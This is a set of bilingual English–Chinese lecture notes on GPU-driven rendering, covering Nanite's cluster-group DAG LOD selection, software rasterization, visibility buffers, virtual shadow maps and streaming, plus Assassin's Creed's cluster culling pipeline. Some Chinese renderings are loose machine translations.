    • Especially between deep subtrees

      尤其是在深子树之间

    webp

    webp

    Nanite Solution - Cluster Group

    Nanite 解决方案-集群集团

    • Can detect these cases during build

      可以在构建过程中检测到这些情况

    • Group clusters

      集团集群

    • Force them to make the same LOD decision

      迫使他们做出相同的 LOD 决定

    • Now free to unlock shared edges and collapse them

      现在可以自由解锁共享边并折叠它们

    webp

    Build Operations

    构建操作

    • Pick grouped these 4 adjacent clusters

      将这 4 个相邻的集群进行分组

    • Merge and Simplify the clusters to half the number of triangles

      将簇合并并简化为三角形数量的一半

    • Split simplified triangle list back into 2 new clusters

      将简化的三角形列表拆分回 2 个新集群

    • We now have reduced 4 4-triangle clusters to 2 4-triangle clusters

      我们现在已经将 4 个 4 三角聚类减少到 2 个 4 三角群集

    webp

    • Cluster original triangles

      对原始三角形进行聚类

    • While NumClusters > 1

      当 NumClusters > 1 时

      • Group clusters to clean their shared boundary

        将集群分组以清理其共享边界

      • Merge triangles from group into shared list

        将组中的三角形合并到共享列表中

      • Simplify to 50% the number of triangles

        将三角形的数量简化到 50%

      • Split simplified triangle list into clusters (128 tris)

        将简化的三角形列表拆分为簇(128 个 tris)

    Build Clusters

    构建集群

    webp

    Simplification on Cluster Group

    集群组的简化

    webp

    webp

    Alternate Group Boundaries between Levels

    级别之间的备用组边界

    • The key idea is to alternate group boundaries from level to level by grouping different clusters.

      关键思想是通过对不同集群进行分组,在不同级别之间交替设置组边界。

    • A boundary in one level becomes the interior in the next level

      一层中的边界成为下一层的内部

    • Locked one level, unlocked the next

      锁定一个级别,解锁下一个级别

    webp

    Cluster group boundaries for LoD0

    LoD0 的集群组边界

    Cluster group boundaries for LoD1

    LoD1 的集群组边界

    Cluster group boundaries for LoD2

    LoD2 的集群组边界

    DAG for Cluster Groups

    集群组的 DAG

    • Merge and split makes this a DAG instead of a tree

      合并和拆分使其成为 DAG 而不是树

      • This is a good thing in that you can’t draw a line from LOD0 all the way to the root without crossing an edge

        这是一件好事,因为你不能在不穿过边的情况下从 LOD0 一直画到根部

      • Meaning there can’t be locked edges that stay locked and collect cruft

        这意味着不可能有锁定的边缘保持锁定并收集碎屑

    webp

    Why DAG, not Tree (Trap!)

    为什么是 DAG,而不是树(陷阱!)

    Jungle of clusters, group and their links

    集群、群体及其联系的丛林

    webp

    Let’s Chop the Lovely Bunny

    webp

    Detail of Simplification - QEM

    简化细节-QEM

    webp

    webp

    Runtime LoD Selection

    运行时 LoD 选择

    View-Dependent LoD Selection on DAG?

    DAG 上的视图相关 LoD 选择?

    Group is faster than cluster, but DAG is still very complicated

    组比簇快,但 DAG 仍然非常复杂

    webp

    LOD Selection for Cluster Group

    聚类组的 LOD 选择

    • Two submeshes with same boundary, but different LOD

      具有相同边界但 LOD 不同的两个子板

    • Choose between them based on screen-space error

      根据屏幕空间错误在它们之间进行选择

      • Error calculated by simplifier projected to screen

        投影到屏幕上的简化器计算误差

      • Corrected for distance and angle distortion at worst-case point in sphere bounds

        针对球体边界中最坏情况点的距离和角度失真进行了校正

    • All clusters in group must make same LOD decision

      组中的所有集群都必须做出相同的 LOD 决策

      • How? Communicate? No!

        怎么办?沟通?不!

      • Same input => same output

        相同的输入 => 相同的输出

    webp

    LOD Selection in Parallel

    并行 LOD 选择

    • LOD selection corresponds to cutting the DAG

      LOD 选择对应于切割 DAG

      • How to compute in parallel?

        如何并行计算?

      • Don’t want to traverse the DAG at run-time

        不想在运行时遍历 DAG

    • What defines the cut?

      切割的定义是什么?

      • Difference between parent and child

        父母和孩子的区别

    • Draw a cluster when:

      在以下情况下绘制集群:

      • Parent error is too high && Our error is small enough

        父错误太高 & 我们的错误足够小

      • Can be evaluated in parallel!

        可以并行评估!

    webp

    • Only if there is one unique cut

      只有当有一个独特的切割

      • Force error to be monotonic

        力误差为单调

    • Parent view error >= child view error

      父视图错误 >= 子视图错误

    • Careful implementation to make sure runtime correction is also monotonic

      仔细实施以确保运行时校正也是单调的

    webp

    Core Equation of Parallel LoD Selection for Cluster Groups

    集群并行 LoD 选择的核心方程

    • When can we LOD cull a cluster?

      我们什么时候可以 LOD 剔除集群?

      • Render: ParentError > threshold && ClusterError <= threshold

        渲染:父错误 > 阈值 && ClusterError <= 阈值

      • Cull: ParentError <= threshold || ClusterError > threshold

    • Parent is already precise enough. No need to check child

      家长已经足够精确了。无需检查孩子

      • ParentError <= threshold

        父错误 <= 阈值

      • Tree based on ParentError, not ClusterError!

        基于 ParentError 的树,而不是 ClusterError!

    Isolated LoD Selection for Each Cluster Group

    每个集群组的独立 LoD 选择

    • Render: ParentError > threshold && ClusterError <= threshold
    • Cull: ParentError <= threshold || ClusterError > threshold

    webp

    BVH Acceleration for LoD Selection

    用于 LoD 选择的 BVH 加速

    Really Bad Explanation of Why and How about BVH

    关于 BVH 的原因和原因的糟糕解释

    • BVH4

      • Max of children’s ParentError

        儿童父母最大错误

      • Internal node: 4 children nodes

        内部节点:4 个子节点

      • Leaf node: List of clusters in group

        叶子节点:组中的簇列表

    Build BVH for Acceleration of LoD Selection

    构建 BVH 以加速 LoD 选择

    • 7,000,000 triangles will create 110,000 clusters

      7000000 个三角形将创建 110000 个簇

    • Iterating all cluster/cluster groups is too slow

      迭代所有集群/集群组太慢

    • Let’s build BVH for each LoD cluster groups

      让我们为每个 LoD 集群组构建 BVH

    webp

    Balance BVH for 4 Nodes

    平衡 4 个节点的 BVH

    webp

    Detail of BVH Acceleration

    • total 110437 clusters,

      总共 110437 个簇,

    • check bvh node = 107, check cluster = 4240,

      检查 bvh 节点 = 107、检查簇 = 4240

    • select cluster = 2175

      选择群集 = 2175

    webp

    Hierarchical Culling - Naive Approach

    分层剔除-朴素方法

    • Dependent DispatchIndirects

      依赖视差间接

      • One per level

        每层一个

    • Global synchronization

      全局同步

      • Wait for idle between every level

        在每个级别之间等待空闲

    • Worst case # of levels

      最坏情况下的级别数量

      • Empty dispatches at the end

        末尾为空调度

    • Can be mitigated by higher fanout

      可以通过更高的扇出来缓解

      • Wasteful for small/distant objects

        对小/远距离物体浪费

    webp

    Persistent Threads

    持久线程

    • Ideally

      理想情况下

      • Start on child as soon as parent finished

        父母一完成,就从孩子开始

      • Spawn child threads directly from compute

        直接从计算中生成子线程

    • Persistent threads model instead

      改为持久线程模型

      • Can’t spawn new threads. Reuse them instead!

        无法生成新线程。重复使用它们!

      • Manage our own job queue

        管理我们自己的作业队列

      • Single dispatch with enough worker threads to fill GPU

        单分派,具有足够的工作线程来填充 GPU

      • Use simple multi-producer multi-consumer (MPMC) job-queue to communicate between threads

        使用简单的多生产者多消费者(MPMC)作业队列在线程之间进行通信

    webp

    Nanite Rasterization

    Nanite 光栅化

    Pixel Scale Detail

    像素比例细节

    • Can we hit pixel scale detail with triangles > 1 pixel?

      我们可以用大于 1 像素的三角形来达到像素级的细节吗?

    • Depends how smooth

      取决于平滑程度

    • In general no

      一般来说,没有

    • Need to draw pixel sized triangles

      需要绘制像素大小的三角形

    webp

    Hardware Rasterization

    硬件光栅化

    • HW Rasterization unit is quad (2x2 pixels) for ddx and ddy

      对于 ddx 和 ddy,HW 光栅化单元为四边形(2x2 像素)

    • Need help pixels (yellow) to form quads

      需要帮助像素(黄色)来形成四边形

    webp

    • Use 4x4 tiled traversal to accelerate

      使用 4x4 平铺遍历来加速

    webp

    • A lot of wasting for small triangle

      小三角形浪费很多

    • tiled traversal stage is useless

      平铺遍历阶段毫无用处

    • quad generate 4x pixels than its really covered

      四边形产生的像素比实际覆盖的像素多 4 倍

    webp

    Software Rasterization for Tiny Triangles

    微小三角形的软件光栅化

    • Terrible for typical rasterizer

      对于典型的光栅化器来说很糟糕

    • Typical rasterizer:

      典型光栅化器:

      • Macro tile binning

        宏平铺

      • Micro tile 4x4

        微型瓷砖 4x4

      • Output 2x2 pixel quads

        输出 2x2 像素四边形

      • Highly parallel in pixels not triangles

        像素高度平行,而非三角形

    • Modern GPUs setup 4 tris/clock max

      现代 GPU 设置最大 4 tris / 时钟

      • Outputting SV_PrimitiveID makes it even worse

        输出 SV_PrimitiveID 会使情况变得更糟

    • Can we beat the HW rasterizer in SW?

      我们能在软件中击败硬件光栅化器吗?

    3x faster!

    webp

    Nanite – Rasterization

    Nanite-光栅化

    • Only rasterize 1 pixel when the triangle size smaller than 1 pixel in Shader function

      当着色器函数中的三角形尺寸小于 1 像素时,仅光栅化 1 像素

    • We will save 3 pixels compute resources if the triangle only covered in 1 pixel

      如果三角形只覆盖 1 个像素,我们将节省 3 个像素的计算资源

    • Reconstruct derivatives for ddx/ddy

      重建 ddx/ddy 的导数

    webp

    Scanline Software Rasterizer

    扫描线软件光栅化器

    • Per-cluster based rasterization selection

      基于每个集群的光栅化选择

      • All edges of cluster <18 pixels are SW rasterized

        所有小于 18 像素的簇边缘都进行了 SW 光栅化

    • Iterate over the rect tests a lot of pixels

      迭代 rect 测试大量像素

    • Best case half are covered

      最好的一半都包括在内

    • Worst case none are

      最坏的情况是没有

    • Scanline method is a choice

      扫描线方法是一种选择

    webp

    How To Do Depth Test?

    如何进行深度测试?

    • Don’t have ROP or depth test hardware

      没有 ROP 或深度测试硬件

    • Need Z-buffering

      需要 Z-缓冲

      • Can’t serialize at tiles

        无法在图块上序列化

      • Many tris may be in parallel for single tile or even single pixel

        对于单个图块甚至单个像素,许多 tris 可能是并行的

    • Use 64 bit atomics!

      使用 64 位原子!

    32257
    Depth
    深度
    Visible cluster index
    可见集群索引
    Triangle index
    三角形索引
    • InterlockedMax

      联锁 Max

      • Visibility buffer shows its true power

        可见性缓冲显示其真正的力量

    Nanite Visibility Buffer

    Nanite 可见性缓冲区

    NumberBits32257
    Type
    类型
    Depth
    深度
    Visible cluster index
    可见集群索引
    Triangle index
    三角形索引

    webp

    • Write geometry data to screen

      将几何数据写入屏幕

      • Depth : InstanceID : TriangleID

        深度:实例 ID:三角形 ID

    • Material shader per pixel:

      每像素材质着色器:

      • Load VisBuffer

        加载 VisBuffer

      • Load instance transform

        加载实例转换

      • Load 3 vert indexes

        加载 3 个涵洞索引

      • Load 3 positions

        加载 3 个位置

      • Transform positions to screen

        将位置转换到屏幕

      • Derive barycentric coordinates for pixel

        推导像素的重心坐标

      • Load and lerp attributes

        加载和 lerp 属性

    • Sounds crazy? Not as slow as it seems

      听起来很疯狂?没有看起来那么慢

      • Lots of cache hits

        大量缓存命中

      • No overdraw or pixel quad inefficiencies

        没有过度绘制或像素四边形效率低下

    • Material pass writes GBuffer

      物料传递写入 GBuffer

      • Integrates with rest of our deferred shading renderer

        与我们的其他延迟着色渲染器集成

    • Draw all opaque geometry with 1 draw

      用 1 次绘制绘制所有不透明几何体

      • Completely GPU driven

        完全由 GPU 驱动

      • Not just depth prepass

        不仅仅是深度预付

      • Rasterize triangles once per view

        每个视图对三角形进行一次栅格化

    Hardware Rasterization

    硬件光栅化

    • What about big triangles?

      大三角形呢?

    • Use HW rasterizer

      使用硬件光栅化器

    • Choose SW or HW per cluster

      为每个集群选择软件或硬件

    • Also uses 64b atomic writes to UAV

      还使用 64b 原子写入无人机

    webp

    Imposters for Tiny Instances

    微小实例的冒名顶替者

    • 12 x 12 view directions in atlas

      图集中 12 x 12 个视图方向

      • XY atlas location octahedral mapped to view direction

        XY 图集位置八面体映射到视图方向

      • Dithered direction quantization

        离散方向量化

    • 12 x 12 pixels per direction

      每个方向 12 x 12 像素

      • Orthogonal projection

        正交投影

      • Minimal extents fit to mesh AABB

        最小范围适合网眼 AABB

      • 8:8 Depth, TriangleID

        8:8 深度,三角形 ID

      • 40.5KB per mesh always resident

        每个网格始终驻留 40.5KB

    • Ray march to adjust parallax between directions

      光线行进以调整方向之间的视差

      • Few steps needed due to small parallax

        由于视差小,需要很少的步骤

    • Drawn directly from instance culling pass

      直接从实例剔除过程中提取

      • Bypassing visible instances list

        绕过可见实例列表

    • Would like to replace with something better

      想换个更好的

    webp

    Rasterizer Overdraw

    光栅过冲

    • No per triangle culling

      无每个三角形的剔除

    • No hardware HiZ culling pixels

      无硬件 HiZ 剔除像素

    • Our software HZB is from previous frame

      我们的软件 HZB 来自上一帧

      • Culls clusters not pixels

        剔除聚类而非像素

      • Resolution based on cluster screen size

        基于集群屏幕大小的分辨率

    • Excessive overdraw from:

      过度透支来自:

      • Large clusters

        大型集群

      • Overlapping clusters

        重叠集群

      • Aggregates

        骨料

      • Fast motion

        快速运动

    • Overdraw expense

      超支费用

      • Small tris: Vertex transform and triangle setup bound

        小三角:顶点变换和三角形设置边界

      • Medium tris: Pixel coverage test bound

        中等分辨率:像素覆盖率测试范围

      • Large tris: Atomic bound

        大三体:原子束缚

    webp

    Nanite Deferred Material

    Nanite 递延材质

    Deferred Material

    递延材质

    • Nanite want to support full artist created pixel shaders

      Nanite 希望支持完全由艺术家创建的像素着色器

    • In theory, all materials could be applied in a single pass, but there are complexities and inefficiencies there

      理论上,所有材质都可以一次性使用,但存在复杂性和效率低下的问题

    webp

    Material Shading

    材质着色

    • Common method

      常用方法

      • Draw a full screen quad per unique material

        为每种独特材质绘制全屏四边形

      • Skip pixels not matching this material

        跳过与此材质不匹配的像素

    • Disadvantages

      缺点

      • CPU unaware if some materials have no visible pixels (unfortunate side effect of GPU driven)

        CPU 不知道某些材质是否没有可见像素(GPU 驱动的不幸副作用)

      • So unnecessary drawing instructions will be committed

        因此,将提交不必要的图纸说明

    Shading Efficiency

    遮光效率

    • Hardware depth test!

      硬件深度测试!

      • Convert material ID to depth value

        将材质 ID 转换为深度值

    webp

    Shading

    • Then draw a full screen quad and set depth test function to “equal”, so unmatched pixels will be discarded

      然后绘制一个全屏四边形,并将深度测试功能设置为“相等”,这样不匹配的像素将被丢弃

    • But full screen quad is not necessary and can be improved!

      但全屏四屏不是必需的,可以改进!

    Material Sorting with Tile-Based Rendering

    基于平铺渲染的材质排序

    • We can do a screen tile material classification

      我们可以做一个筛网材质分类

    • For a certain material, exclude tiles that do not contain this material

      对于某种材质,排除不包含此材质的瓷砖

    webp

    Material Classify

    材质分类

    webp

    Material Classify - Material Tile Remap Table

    材质分类-材质瓷砖重绘表

    • Finally forms a material and tile remap table

      最后形成材质和瓷砖重映射表

    • Get the number of tiles based on the screen resolution and pack 32 tiles into a group

      根据屏幕分辨率获取图块数量,并将 32 个图块打包成一组

    • ‘MaterialRemapCount’ means the number of groups

      “MaterialRemapCount” 是指组的数量

    • Record the tiles in which a material is located by marking it by bit

      通过逐点标记来记录材质所在的瓷砖

    • This table can be used to calculate the tile position to render to

      此表可用于计算要渲染的图块位置

    webp

    Deferred Material Overall Process

    递延材质整体流程

    • Generate material resolve texture

      生成材质解析纹理

    • Generate material depth texture

      生成材质深度纹理

    • Classify screen tile materials

      对筛网材质进行分类

    • Generate G-Buffer

      生成 G-缓冲区

      • This will be output to the g-buffer to match with the rest of the pipeline

        这将被输出到 g-buffer,以与管道的其余部分相匹配

      • Commit drawing commands per material

        按材质提交绘图命令

    webp

    void UnpackMaterialResolve(uint Packed,
    out bool IsNanitePixel,
    out bool IsDecalReceiver,
    out uint MaterialSlot)
    {
    IsNanitePixel = BitFieldExtractU32(Packed,10) != 0;
    MaterialSlot = BitFieldExtractU32(Packed, 14, 1);
    IsDecalReceiver = BitFieldExtractU32(Packed, 1, 15) != 0:

    Shadows

    Micropoly Level Detail for Shadows

    阴影的微多层细节

    webp

    Nanite Shadows - Ray Trace?

    Nanite 阴影-射线追踪?

    • Ray trace?

      射线追踪?

    • There are more shadow rays than primary since there are on average more than 1 light per pixel

      由于每个像素平均有 1 个以上的光,因此阴影光线比主光线多

    • Custom triangle encoding

      自定义三角形编码

    • No partial BVH updates

      无部分 BVH 更新

    • HW triangle formats + BLAS (bottom level acceleration structure) currently are 3-7x the size of Nanite data

      HW 三角形格式 + BLAS(底层加速结构)目前是 Nanite 数据大小的 3-7x

    webp

    RTX 40XX,50XX? Radeon RX 70XX…?

    Recap Cascaded Shadow Map

    回顾级联阴影图

    • Relatively coarse LOD control

      LOD 控制相对粗糙

    • If better shadow detail is desired, there is still significant memory consumption

      如果需要更好的阴影细节,仍然会消耗大量内存

    webp

    Sample Distribution Shadow Maps

    示例分布阴影图

    • Gives a better cascaded map coverage by analysing the range of screen pixel depths

      通过分析屏幕像素深度范围,提供更好的级联地图覆盖率

    • An optimized cascaded shadow map but still has coarse LOD control

      优化的级联阴影贴图,但仍具有粗略的 LOD 控制

    webp

    webp

    Virtual Shadow Map - A Cached Shadow System!

    虚拟阴影地图-缓存的阴影系统!

    • Most lights don’t move, should be cached as much as possible

      大多数灯光不会移动,应尽可能缓存

    webp

    Virtual Shadow Maps

    虚拟阴影地图

    • 16k x 16k virtual shadow map for each light (exception, point light with 6 VSMs)

      每个灯光的 16k x 16k 虚拟阴影贴图(具有 6 个 VSM 的点光源除外)

    webp

    Different Light Type Shadow Maps

    不同的灯光类型阴影贴图

    webp

    Shadow Page Allocation

    影子页面分配

    • Only visible shadow pixels need to be cached

      只需要缓存可见的阴影像素

      • For each pixel on screen

        对于屏幕上的每个像素

      • For all lights affecting this pixel

        对于影响此像素的所有灯光

      • Project the position into shadow map space

        将位置投影到阴影贴图空间

      • Pick the mip level where 1 texel matches the size of 1screen pixel

        选择 1 个纹理像素与 1 个屏幕像素大小匹配的 mip 级别

      • Mark the page as needed

        根据需要标记页面

      • Allocate physical page space for uncached pages

        为未缓存的页面分配物理页面空间

    Shadow Page Table and Physical Pages Pool

    影子页表和物理页池

    webp

    Shadow Page Cache Invalidation

    卷影页缓存无效

    • Camera movement, if the movement is relatively smooth, there will not be many pages to update

      相机移动,如果移动相对平稳,就不会有很多页面需要更新

    • Any light movement or rotation will invalidate all cached pages for that light

      任何灯光移动或旋转都会使该灯光的所有缓存页面无效

    • Geometry that casts shadows moving, or being added or removed from the scene will invalidate any pages that overlap its bounding box from the light’s perspective

      投射阴影的几何体在场景中移动、添加或删除,将使从灯光角度与其边界框重叠的任何页面无效。

    • Geometry using materials that may modify mesh positions

      使用可能修改网格位置的材质的几何体

    Shadow Demo

    webp

    Conclusions

    结论

    • Number of shadow pages proportional to screen pixels

      与屏幕像素成比例的阴影页数

    • Shadow cost scales with resolution and number of lights per pixel

      阴影成本随分辨率和每像素的灯光数量而变化

    webp

    Streaming and Compression

    流媒体和压缩

    Streaming

    流媒体

    • Virtualized geometry

      虚拟几何体

      • Unlimited geometry at fixed memory budget

        固定内存预算下的无限几何图形

    • Conceptually similar to virtual texturing

      概念上类似于虚拟纹理

      • GPU requests needed data then CPU fulfills them.

        GPU 请求所需的数据,然后 CPU 完成它们。

      • Unique challenges: must no cracks in the geometry

        独特的挑战:几何体中不得有裂纹

    • Cut DAG at runtime to only loaded geometry

      在运行时将 DAG 剪切为仅加载的几何体

      • Needs to always be a valid cut of full DAG

        需要始终是完整 DAG 的有效切割

      • Similar to LOD cutting. No cracks

        类似于 LOD 切割。无裂纹

    webp

    Paging

    分页

    • Fill fixed-sized pages with groups

      用组填充固定大小的页面

    • Based on spatial locality to minimize pages needed at runtime

      基于空间局部性,以最小化运行时所需的页面

      • Sort groups by mip and spatial locality

        按 mip 和空间位置对组进行排序

    • Root page (64k)

      根页面(64k)

      • First page contains top lod level(s) of DAG

        第一页包含 DAG 的顶级 lod 级别

      • Always resident on GPU so we always have something to render

        始终驻留在 GPU 上,所以我们总是有东西要渲染

    • Streaming Page (128k)

      流媒体页面(128k)

      • Other lod levels of cluster groups

        集群组的其他 lod 水平

      • Life time is managed by LRU on CPU

        寿命由 CPU 上的 LRU 管理

    • Page contents:

      页面内容:

      • Index data,Vertex data, Bounds, LOD info, Material tables, etc.

        索引数据、顶点数据、边界、LOD 信息、材质表等。

    webp

    Memory representation

    内存表示

    Vertex quantization and encoding

    顶点量化和编码

    • Global quantization

      全局量化

      • A combination of artist control and heuristics

        艺术家控制和启发式的结合

      • Clusters store values in local coordinates that is relative to value min/max range

        集群将值存储在相对于值最小/最大范围的局部坐标中

    • Per-cluster custom vertex format

      每簇自定义顶点格式

      • Uses minimum number of bits per component: ceil(log2(range))

        使用每个组件的最小位数:ceil(log2(range))

      • Just a string of bits, not even byte aligned

        只是一串比特,甚至没有字节对齐

    • Decoded using GPU bit-stream reader because of divergent encode format between clusters

      由于集群之间的编码格式不同,使用 GPU 比特流读取器进行解码

    webp

    Disk Representation

    磁盘表示法

    • Hardware LZ decompression

      硬件 LZ 解压

      • In consoles now and on its way to PC with DirectStorage

        现在在控制台中,并正在通过 DirectStorage 进入 PC

      • Unbeatably fast, but general purpose

        速度无与伦比,但用途广泛

      • String deduplication and entropy coding

        字符串重复数据删除和熵编码

    • For better compression

      为了更好的压缩

      • Domain-specific transforms

        特定于域的转换

      • Focus on redundancies not already captured by LZ and massaging the data to better fit how LZ compression

        关注 LZ 尚未捕获的冗余,并对数据进行处理,以更好地适应 LZ 压缩方式

    • Transcode on the GPU

      GPU 上的转码

      • High throughput for parallel transforms, currently runs at ~50GB/s with fairly unoptimized code on PS5

        并行转换的高吞吐量,目前在 PS5 上以约 50GB/s 的速度运行,代码相当未优化

      • Powerful in combination with hardware LZ

        与硬件 LZ 结合使用功能强大

      • Eventually stream data directly to GPU memory

        最终将数据直接流式传输到 GPU 内存

    Results: Lumen in the Land of Nanite

    结果:Nanite 土地上的管腔

    • 433M Input triangles, 882M Nanite triangles

      433M 输入三角形,882M Nanite 三角形

    • Raw data: 25.90GB Memory format: 7.67GB

      原始数据:25.90GB 内存格式:7.67GB

    • Compressed: 6.77GB Compressed disk format: 4.61GB

      压缩:6.77GB 压缩磁盘格式:4.61GB

    • ~20% improvement since Early Access

      自早期访问以来提高了约 20%

    • 5.6 bytes per Nanite triangle, 11.4 bytes per input triangle

      每个 Nanite 三角形 5.6 个字节,每个输入三角形 11.4 个字节

    • 1M triangles = ~10.9MB on disk

      1M 三角形 = 磁盘上约 10.9MB

    webp

    Welcome to Billions of Triangles World

    欢迎来到亿万三角形世界

    Jungle of Nanite Geometries

    Nanite 几何丛林

    webp

    References

    ]]>
    + 资源

    课程

    “Long” Pipeline of Traditional Rendering

    传统渲染的“长”管道

    • Compute unit works with graphics processor and rasterizer

      计算单元与图形处理器和光栅化器配合使用

    • It’s a series of data processing units arranged in a chain like manner

      它是一系列以链式方式排列的数据处理单元

    • Difficult to fully fill the GPU

      很难完全填满 GPU

    webp

    Jungle of Direct Draw Graphics API

    直接绘制图形的丛林 API

    Explosion of DrawCalls:

    DrawCalls 激增:

    • Meshes x RenderStates x LoDs x Materials x Animations

      网格 x 渲染状态 x LoD x 材质 x 动画

    webp

    Problem 1: A traditional DrawIndexedInstanced command requires 5 arguments assigned on CPU

    问题 1:传统的 DrawIndexed Instanced 命令需要在 CPU 上分配 5 个参数

    webp

    Problem 2: Driver state switching overhead between amount of draw commands

    问题 2:在绘制命令数量之间切换驱动程序状态的开销

    Bottleneck of Traditional Rendering Pipeline

    传统渲染管道的瓶颈

    webp

    When rendering complicated scene with dense geometries and many materials

    渲染具有密集几何体和许多材质的复杂场景时

    • High CPU overload

      CPU 过载严重

    • Frustum/Occlusion Culling

      颅骨/闭塞切除术

    • Prepare drawcall

      准备图纸

    • GPU idle time

      GPU 空闲时

    • CPU can not follow up GPU

      CPU 无法跟踪 GPU

    • High driver overhead

      驾驶员头顶高度

    • GPU state exchange overhead when solving large amount of drawcalls

      解决大量 drawcall 时的 GPU 状态交换开销

    Compute Shader - General Computation on GPU

    计算着色器-GPU 上的通用计算

    • High-speed general purpose computing and takes advantage of the large numbers of parallel processors on the GPU

      高速通用计算,并利用 GPU 上的大量并行处理器

    • Less overhead to graphics pipeline

      减少图形管道的开销

    • Just one stage in pipeline

      只是管道中的一个阶段

    webp

    Draw-Indirect Graphics API

    绘图-直接图形 API

    Advantage:

    优点:

    • Allow you to specify parameters to draw commands from a GPU buffer, or via GPU compute program

      允许您指定参数以从 GPU 缓冲区或通过 GPU 计算程序绘制命令

    • “Draw-Indirect” command can merge a lot of draw calls into one single draw call, even with different mesh topology

    “绘制间接”命令可以将许多绘制调用合并到一个绘制调用中,即使使用不同的网格拓扑

    Notice:

    注意:

    • The actual name of “Draw-Indirect” is different in each graphics platform, but they act as the same role. (e.g.
      vkCmdDrawIndexedIndirect(Vulkan), ExecuteIndirect(D3D12), …)

      “绘制间接”的实际名称在每个图形平台中都不同,但它们扮演着相同的角色。

    webp

    GPU Driven Render Pipeline – DrawPrimitive vs. DrawScene

    GPU 驱动的渲染管道——DrawPrimitive 与 DrawScene

    • GPU controls what objects are actually rendered

      GPU 控制实际渲染的对象

      • Lod selection, visibility culling on GPU

        Lod 选择,GPU 上的可见性剔除

    • No CPU/GPU roundtrip

      无 CPU/GPU 往返

      • CPU do not touch any GPU data

        CPU 不接触任何 GPU 数据

    • N viewports/frustums

      N 个视口/视锥

    Frees up the CPU to be used on other things, ie. AI

    释放 CPU 以用于其他事情

    webp

    GPU Driven Pipeline in Assassins Creed

    《刺客信条》中的 GPU 驱动流水线

    Motivation

    动机

    • Massive amounts of geometry: architecture, seamless interiors, crowds

      大量的几何形状:建筑、无缝的内部、人群

    Use mesh cluster rendering to

    使用网格簇渲染

    • Allow much more aggressive batching and culling granularity

      允许更严格的批处理和剔除粒度

    • Render different meshes efficiently with a single indirect draw command

      使用单个间接绘制命令高效渲染不同的网格

    webp

    Mesh Cluster Rendering

    网格簇渲染

    • Require

      需要

      • Fixed cluster topology (E.g. 64 triangles in Assassin Creed or 128 triangles in Nanite)

        固定集群拓扑(例如,刺客信条中的 64 个三角形或 Nanite 中的 128 个三角形)

      • Split & rearrange all meshes to fit fixed topology (insert degenerate triangles)

        拆分并重新排列所有网格以适应固定拓扑(插入退化三角形)

      • Fetch vertices manually in VS

        在 VS 中手动获取顶点

    • Key Implementation

      关键实施

      • Cull clusters by their bounding on GPU (usually by compute shader)

        通过 GPU 上的边界(通常通过计算着色器)剔除集群

      • GPU outputs culled cluster list & drawcall args

        GPU 输出精选集群列表和绘图调用参数

      • Draw arbitrary number of visible clusters in single drawcall

        在单个 drawcall 中绘制任意数量的可见簇

    webp

    GPU Driven Pipeline in Assassins Creed

    《刺客信条》中的 GPU 驱动流水线

    • Overview

      概述

      • Offload more work from CPU to GPU

        将更多工作从 CPU 转移到 GPU

      • But not perfectly “draw scene” command, can only draw objects with the same material together

        但不是完美的“绘制场景”命令,只能将具有相同材质的对象绘制在一起

    webp

    Works on CPU side

    webp

    在 CPU 端工作

    • Perform very coarse frustum culling and then batch all unculled objects together by material

      执行非常粗略的截头体剔除,然后按材质将所有未剔除的对象批处理在一起

      • CPU quad tree culling

        CPU 四叉树剔除

      • Drawcalls merged based on hash that build on noninstanced data:(e.g. material, renderstate, …).

        基于非实例化数据构建的哈希合并的绘图调用:(例如材质、渲染状态等)。

    • Update per instance data(e.g. transform, LOD factor…),static instances are persistent

      更新每个实例的数据(例如转换、LOD 因子等),静态实例是持久的

    GPU Instance Culling

    GPU 实例剔除

    • Output cluster chunks after instance culling

      实例剔除后输出集群块

    • Use the cluster chunk expansion (64 cluster in a chunk) to balance GPU threads within a wavefront.

      使用集群块扩展(一个块中有 64 个集群)来平衡波阵面内的 GPU 线程。

    webp

    GPU Cluster Culling

    GPU 集群剔除

    • Cluster culling by cluster bounding box

      通过聚类边界框进行聚类剔除

      • output cluster list

        输出集群列表

    • Triangle backface culling

      三角形背面剔除

      • output triangle visibility result and write offsets in new index buffer

    webp

    Index Buffer Compaction

    索引缓冲区压缩

    • Prepare a empty index buffer(8Mb) and per-assign space for each mesh instance

      为每个网格实例准备一个空的索引缓冲区(8Mb)和每个分配的空间

    • Parallel copy the visible triangles index into the new index buffer

      将可见三角形索引并行复制到新索引缓冲区中

    • Index buffer compaction and multi-draw rendering can be interleaved because of fixed size of new index buffer (8Mb)

      由于新索引缓冲区的大小固定(8Mb),索引缓冲区压缩和多绘制渲染可以交错进行

    webp

    Codec Triangle Visibility in Cube: Backface Culling

    立方体中的编解码器三角形可见性:背面消隐

    • Bake triangle visibility for pixel frustums of cluster centered cubemap

      簇中心立方体贴图像素平截头体的烘焙三角形可见性

    • Cubemap lookup based on camera

      基于相机的立方体贴图查找

    • Fetch 64 bits for visibility of all triangles in cluster

      获取 64 位以查看集群中所有三角形的可见性

    webp

    webp

    Occlusion Culling for Camera and Shadow

    相机和阴影的遮挡抑制

    Occlusion Depth Generation

    遮挡深度生成

    • Depth pre-pass with best occluders in full resolution

      全分辨率下使用最佳封堵器进行深度预处理

      • Choose best occluders by artist or heuristic (e.g. 300 occluders)

        按艺术家或启发式方法选择最佳封堵器(例如 300 个封堵器)

      • Holes can be from rejected occluder (bad occluder selection or alpha-tested geometry)

        孔可能来自被拒绝的封堵器(封堵器选择不当或阿尔法测试几何形状)

    • Downsampled best occluders depth to 512x256

      下采样最佳封堵器深度为 512x256

    • Then combined with reprojection of 1/16 low resolution version of last frame’s depth

      然后结合最后一帧深度的 1/16 低分辨率版本的重新投影

      • Last frame’s depth can helped to filled with holes.

        最后一帧的深度有助于填补孔洞。

      • False occlusion is possible from large moving objects in the last frame’s depth, but works in most cases.

        在最后一帧的深度中,大型移动对象可能会出现假遮挡,但在大多数情况下都是有效的。

    • Generate hierarchy-Z buffer for GPU culling

      生成用于 GPU 剔除的分层 Z-缓冲区

    webp

    Two-Phase Occlusion Culling

    两相闭塞消隐

    1st phase

    第一阶段

    Cull objects & clusters using last frame’s depth pyramid

    使用上一帧的深度金字塔剔除对象和簇

    Render visible objects

    渲染可见对象

    2nd phase

    第二阶段

    Refresh depth pyramid

    刷新深度金字塔

    Test culled objects & clusters

    测试剔除的物体和集群

    Render false negatives

    渲染假阴性

    webp

    Crazy Stressing Cases

    疯狂压力案例

    • “Torture” unit test scene 250,000separate moving objects

      “酷刑”单元测试场景 250000 个独立移动物体

    • 1GB of mesh data (10k+ meshes)

      1GB 网格数据(10k+ 网格)

